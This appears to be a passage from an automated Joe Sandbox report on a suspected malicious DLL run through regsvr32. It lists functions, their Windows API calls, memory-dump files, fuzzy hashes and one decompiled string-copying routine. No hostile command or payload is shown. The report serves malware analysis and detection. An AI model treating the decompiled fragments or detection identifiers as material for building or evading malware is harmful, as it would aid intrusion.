                                    • Sleep.KERNEL32(0000000A,?,?,001A5FAE,?,?,?,?,?,001A66FE,?,00000001), ref: 001A1013
                                    • HeapFree.KERNEL32(00000000), ref: 001A1041
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A1056
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                    • String ID:
                                    • API String ID: 58946197-0
                                    • Opcode ID: a4a30cfabe73ebe8a7f14319d21b20258087d8583843adfe9af7959ef2d6af11
                                    • Instruction ID: c6e007bcd5820e731749543ceaa224b6895193b85a67dc3984820dad28ea4418
                                    • Opcode Fuzzy Hash: a4a30cfabe73ebe8a7f14319d21b20258087d8583843adfe9af7959ef2d6af11
                                    • Instruction Fuzzy Hash: 37F0DA78200240EBEB19CB24DE89A153BA9BF0B741B054019F902D7B61C734ACC0DA11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C766F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 6E2C77DB
                                      • Part of subcall function 6E2C7501: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E2C7503
                                      • Part of subcall function 6E2C7501: GetCurrentProcess.KERNEL32(C0000417), ref: 6E2C7525
                                      • Part of subcall function 6E2C7501: TerminateProcess.KERNEL32(00000000), ref: 6E2C752C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                    • String ID: *?$.
                                    • API String ID: 2667617558-3972193922
                                    • Opcode ID: 6816fd5b34c40beb9d822d6f4898dd8429274c1cba0d87c3e4212a50c6b83c08
                                    • Instruction ID: 5b28a98b3633f6e94b9cbc015a367e7efef628ddc957e3be40e2d3da9c567041
                                    • Opcode Fuzzy Hash: 6816fd5b34c40beb9d822d6f4898dd8429274c1cba0d87c3e4212a50c6b83c08
                                    • Instruction Fuzzy Hash: EC517E75E0420EDFDB44CFF9C880AADBBBAEF48714F24426AD854E7384E7319A458B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C33A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2C3EE3
                                      • Part of subcall function 6E2C4A72: RaiseException.KERNEL32(?,?,?,6E2C3F05,?,?,?,?,?,?,?,?,6E2C3F05,?,6E2F4D90), ref: 6E2C4AD2
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2C3F00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: ff4c01ab07b7199aad51e7f77e52be7382c4e4b3ebb63bdbff4f74c78d4832da
                                    • Instruction ID: 13e3a710e35b5570263c14fa072c29d2b8602b95834483be7ab8478976db8761
                                    • Opcode Fuzzy Hash: ff4c01ab07b7199aad51e7f77e52be7382c4e4b3ebb63bdbff4f74c78d4832da
                                    • Instruction Fuzzy Hash: 61F0F93944420EB78BC0A6E9EC28DDEB37F7D10E14B904FB0A91496181FF60D51682C3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C7FFD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 6E2C6D3C: GetLastError.KERNEL32(?,?,6E2C7EEB), ref: 6E2C6D40
                                      • Part of subcall function 6E2C6D3C: _free.LIBCMT ref: 6E2C6D73
                                      • Part of subcall function 6E2C6D3C: SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DB4
                                    • _free.LIBCMT ref: 6E2C8063
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID: Pc/n$e
                                    • API String ID: 2283115069-1499828118
                                    • Opcode ID: 51b8984b4470263d1f5c2e4fe0445c6e4cdc77ee188837c4a56f527b5caf20aa
                                    • Instruction ID: f045ce9cd458e01d88cac36be4a0f8d8a69e3c3f82b6798c92f0c883d5e2e130
                                    • Opcode Fuzzy Hash: 51b8984b4470263d1f5c2e4fe0445c6e4cdc77ee188837c4a56f527b5caf20aa
                                    • Instruction Fuzzy Hash: CD017076C51A2E9BCAD59BA8D440199B3B6BB04F26F114709D920A7680C7617942CFC3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A73AF, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A73AF(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E001A77D7(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                    0x001a73c4
                                    0x001a73c8
                                    0x001a73d2
                                    0x001a73d9
                                    0x001a73dc
                                    0x001a73de
                                    0x001a73e6
                                    0x001a73eb
                                    0x001a73f9
                                    0x001a73fe
                                    0x001a7408

                                    APIs
                                    • lstrlenW.KERNEL32(004F0053,?,74EC1499,00000008,032F9534,?,001A1543,004F0053,032F9534,?,?,?,?,?,?,001A6DBE), ref: 001A73BF
                                    • lstrlenW.KERNEL32(001A1543,?,001A1543,004F0053,032F9534,?,?,?,?,?,?,001A6DBE), ref: 001A73C6
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • memcpy.NTDLL(00000000,004F0053,74EC16D0,?,?,001A1543,004F0053,032F9534,?,?,?,?,?,?,001A6DBE), ref: 001A73E6
                                    • memcpy.NTDLL(74EC16D0,001A1543,00000002,00000000,004F0053,74EC16D0,?,?,001A1543,004F0053,032F9534), ref: 001A73F9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlenmemcpy$AllocateHeap
                                    • String ID:
                                    • API String ID: 2411391700-0
                                    • Opcode ID: e4870280bdf7c647b96b1ad46f2226044ca44131fdbe656be26346fdba41cfec
                                    • Instruction ID: 0e68c3e3f8473668239910081c195e1afb6f2083c39f139e73ac48e4494c753b
                                    • Opcode Fuzzy Hash: e4870280bdf7c647b96b1ad46f2226044ca44131fdbe656be26346fdba41cfec
                                    • Instruction Fuzzy Hash: FCF0FF76900118BBCF11DFA9CC45C9E7BACEF093547554062FE08D7112E775EA159BE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A7067, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(032F8AA2,00000000,00000000,00000000,001A730A,00000000), ref: 001A7077
                                    • lstrlen.KERNEL32(?), ref: 001A707F
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • lstrcpy.KERNEL32(00000000,032F8AA2), ref: 001A7093
                                    • lstrcat.KERNEL32(00000000,?), ref: 001A709E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                    • String ID:
                                    • API String ID: 74227042-0
                                    • Opcode ID: a714383ee233c4b174e03fb00cb1e587f8f6179ebf4cf6a311c100437b777b5d
                                    • Instruction ID: 2e3a959b3f37ab5ca32c1d68160aaec12780df7c20c4a6cc10019d873086c4ef
                                    • Opcode Fuzzy Hash: a714383ee233c4b174e03fb00cb1e587f8f6179ebf4cf6a311c100437b777b5d
                                    • Instruction Fuzzy Hash: 95E092375012206B87115BE89C48CAFBBACFF9B7517040456F700D3510C7208944CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%